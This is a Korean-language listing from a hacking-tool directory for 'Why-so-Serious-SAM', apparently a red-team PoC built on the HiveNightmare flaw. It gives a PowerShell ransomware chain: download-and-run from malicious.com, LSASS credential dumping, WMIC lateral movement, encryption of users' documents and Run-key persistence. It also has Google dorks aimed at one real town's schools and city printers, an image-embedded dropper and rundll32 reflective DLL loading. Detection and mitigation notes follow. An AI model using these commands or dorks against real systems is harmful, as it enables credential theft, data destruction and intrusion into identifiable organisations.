Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Why-so-Serious-SAM — 섀도 복사본의 잘못된 ACL을 악용하는 CVE-2021-36934 익스플로잇을 사용하는 PoC 멀웨어로, Windows 10/11에서 LOLBins를 활용한 파일리스 레드팀 방법으로 로컬 NTLM 해시를 얻기 위해 SYSTEM 및 SAM 하이브를 추출합니다. | Kitploit
도구/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Privilege EscalationExploitationLateral MovementPost-ExploitationCTFPenetration TestingLearning & EducationRed TeamingLabs & Practice
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

섀도 복사본의 잘못된 ACL을 악용하는 CVE-2021-36934 익스플로잇을 사용하는 PoC 멀웨어로, Windows 10/11에서 LOLBins를 활용한 파일리스 레드팀 방법으로 로컬 NTLM 해시를 얻기 위해 SYSTEM 및 SAM 하이브를 추출합니다.

11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기웹사이트

HiveNightmare '파일리스' 익스플로잇 PoC:

Screenshot 2025-05-21 001453


목차

  • 개요
  • 기능
  • 랩 시뮬레이션 예제
  • Google Dorks를 이용한 정찰
  • LOLBins 개요
  • 파일리스 드로퍼 임베딩
  • Print Spooler 및 HiveNightmare 익스플로잇
  • 리플렉티브 DLL 인젝션
  • MITRE ATT&CK 매핑
  • 탐지 및 완화
  • 법적 고지
  • 참고 자료 및 추가 읽을거리

개요

CVE-2021-36934/HiveNightmare는 Windows 11에서 파일리스 멀웨어 공격 프레임워크를 시뮬레이션하는 교육용 레드/퍼플 팀 연구 프로젝트입니다. MITRE ATT&CK 기법을 사용하여 실제 적대적 킬체인을 에뮬레이션할 수 있으며, 은밀한 파일리스 운영에 중점을 둡니다.

경고: 격리된 연구소에서의 연구 및 교육 전용입니다. 프로덕션 또는 승인되지 않은 시스템에는 사용하지 마십시오.


기능

  • 엔드투엔드 파일리스 랜섬웨어/와이퍼웨어 공격 시뮬레이션
  • LOLBins(Living Off the Land Binaries) 사용 시연
  • 자격 증명 액세스, 권한 상승, 측면 이동 및 지속성 시연
  • 실용적인 랩 및 정찰 예제 포함
  • 블루 팀 탐지 훈련을 위한 MITRE ATT&CK 매핑

랩 시뮬레이션 예제

다음 PowerShell 시뮬레이션은 Windows 기본 제공 도구(LOLBins)를 사용하는 일반적인 파일리스 랜섬웨어 공격 체인을 보여줍니다:

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Google Dorks를 이용한 정찰

예제 목표: PrintNightmare와 같은 익스플로잇에 취약할 수 있는 미주리주 모벌리의 공개적으로 노출된 프린터 서비스를 식별합니다.

샘플 Google Dork 쿼리:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins 개요

**LOLBins(Living Off the Land Binaries)**은 보안 통제를 우회하고 악성 코드를 파일리스로 실행하기 위해 공격자들이 흔히 악용하는 합법적이고 신뢰받는 Windows 바이너리입니다.

사용 예시 (프린트 서비스 공격):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

공격자는 정찰을 통해 노출된 프린터나 서버를 식별한 후 rundll32.exe, regsvr32.exe, powershell.exe와 같은 LOLBins을 사용하여 네트워크 공유에서 페이로드를 실행하는 경우가 많습니다.


파일리스 드로퍼 임베딩

목표: 이미지 안에 아카이브를 임베딩하고 기본 도구를 사용하여 추출함으로써 페이로드를 은밀하게 전달합니다.

단계:

  1. 페이로드 임베딩:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. 추출 및 디코딩:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

이 방법은 기존의 파일 확장자 필터링을 우회하고 기본 제공 도구를 활용하여 회피형 전달을 수행합니다.


리플렉티브 DLL 인젝션

기법: 리플렉티브 로딩을 사용하여 악성 DLL을 메모리에서 직접 로드 및 실행합니다.

예시:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

이는 디스크에 아티팩트를 남기지 않는 은밀한 인메모리 실행을 가능하게 합니다.


MITRE ATT&CK 매핑


탐지 및 완화

탐지

  • Sysmon + Sigma 규칙:

    • rundll32.exe가 시스템 DLL이 아닌 DLL을 로드하는지 모니터링
    • certutil.exe, regsvr32.exe, mshta.exe의 비정상적인 사용 감시
    • 비관리자의 섀도 볼륨 액세스 추적
  • SIEM 예시 (ELK/Splunk):

    • 공개 공유에서의 실행 알림
    • 부모/자식 프로세스 이상 (예: explorer.exe가 rundll32.exe 생성)
    • PowerShell 또는 CMD의 의심스러운 인코딩 명령

완화

  • 필요하지 않은 경우 Print Spooler 비활성화:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • 모든 보안 패치 적용 및 ACL 강화
  • AppLocker 또는 WDAC로 LOLBins 차단 또는 제한
  • 리플렉티브 DLL 로딩 및 인메모리 공격을 탐지하는 EDR 솔루션 사용

법적 고지

이 저장소의 모든 콘텐츠, 코드 및 기법은 교육 및 승인된 침투 테스트 전용입니다. 통제된 격리 환경 밖에서 또는 명시적 허가 없이 이 프로젝트의 어떤 부분도 사용하지 마십시오. 작성자는 오용에 대한 책임을 지지 않습니다.


참고 자료 및 추가 읽을거리

  • LOLOL Farm – LOLBin 플레이그라운드
  • LOLGEN – LOLBin 체인 생성
  • SeriousSam 탐지
  • DLL 인젝션 입문
  • Print Spooler 익스플로잇 체인
  • 파일리스 멀웨어 – Wikipedia
  • PrintSpoofer (원본)
  • HiveNightmare
  • Mitre Attck T1055
  • HiveNightmare 데모

안전하게 연구하고 책임감 있게 조사하며, 항상 합법적이고 윤리적인 방식으로 사용하십시오.

도구 다운로드
단계기법ID설명
초기 액세스유효 계정 / 드라이브 바이 컴프로마이즈T1078, T1189공개된 프린트 인터페이스 침해
실행DLL 사이드로딩 / LOLBinsT1218, T1055.001신뢰되는 바이너리를 통한 DLL 리플렉티브 실행
권한 상승Print Spooler 익스플로잇 / Hive ACL 남용T1068, T1003.002SYSTEM 수준 액세스 및 SAM 해시 추출
방어 회피파일리스 실행 / 난독화된 파일T1027, T1202certutil, mshta 등을 통해 전달되는 인코딩된 페이로드
자격 증명 액세스LSASS 덤핑 / SAM 하이브 액세스T1003HiveNightmare 이후 자격 증명 덤핑
측면 이동SMB/네트워크 공유 열거T1021.002프린터 공유 또는 스풀러 열거를 통한 확산
영향데이터 파괴 / 암호화T1485, T1486DLL 페이로드를 통해 트리거되는 파일리스 와이퍼웨어